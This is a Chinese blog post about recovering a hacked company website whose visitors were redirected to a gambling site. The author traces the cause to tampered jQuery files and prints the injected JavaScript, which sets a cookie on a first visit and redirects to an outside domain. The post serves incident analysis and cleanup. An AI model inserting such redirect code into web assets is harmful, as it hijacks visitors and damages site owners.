上周困扰我的官网被攻击的事情,今天终于解决啦,现在我分享一下继上篇文章之后,我做了哪些事情。
上篇文章简书链接:点我
一、发现
上次使用D盾工具,查杀了大部分后门程序和感染文件。
而且还在阿里云上做了端口域名限制。
之后我打开官网访问就正常了。
但是,让其他人试试,却还是跳转到博cai网站。
很纳闷~
我试着清理浏览器缓存,然后再访问,果然也跳了博cai网站。
二、分析
针对当前状况,我分析出以下几点:
- 只有
访问官网才会跳链,跳链脚本可能通过
cookie、session来判断; - 重新用d盾查杀,没有找到可疑文件,并且网站这几天出现问题都是上面这种首次跳转的,说明外部攻击和内部传播已经防御成功,接下来解决好一些残留的木马脚本应该就没啥问题了;
- 直接在首页跳转,应该跟官网首页有关,可以查查首页的页面和相关js文件;
三、排查
1. cookie查看
没看出个啥。
2. 页面检查
看了半天,没发现啥异常。
3. 引入js文件
在页面中看到,首页引入了如图js。
我把后面三个js删掉,然后清除缓存数据,再访问官网,发现还是会跳链。
我想,莫非jquary的有问题?
我把之前三个恢复,这次把引入的jquary删了,再次访问。
访问正常,没有跳链了,仅仅只是网页一些效果没有。
ok,能确定是这个jquary文件被动过手脚了。
打开一看,果然。
好家伙!居然首尾都给插了这段代码!
下面我对这段代码注释一下,然后大家就都明白了。
var c = document.cookie;
if (c.indexOf('isfirstvisited=false') != -1) {//访问过,不做任何操作
}
else {
var d = new Date();
d.setFullYear(d.getFullYear() + 1);//cookie有效期1年
document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString();
location = 'https://sdfhu1.com/248486.html'//这个网站最终就是跳到那个博cai网站
}
直接删除这两段代码,官网就正常访问了。
然后我去到其他项目的js文件夹中,排查了所有js,发现还有几个jquary也被修改了,修改完,都能正常访问了。
至此,困扰几天的服务器被攻击事件,在依靠他人智慧和自己分析下,终于解决了。
四、总结
稍微总结一下:
- 平时多注意,该做的防护工作不能嫌麻烦;
- 木马文件等善于伪装,检查时候应当全面;
- 遇到服务器被攻击不要慌张,细心分析查找,总能解决的;
好了,文章到这里结束了,感谢阅读,也希望这次经历能对遇到同样困扰的朋友有所帮助。
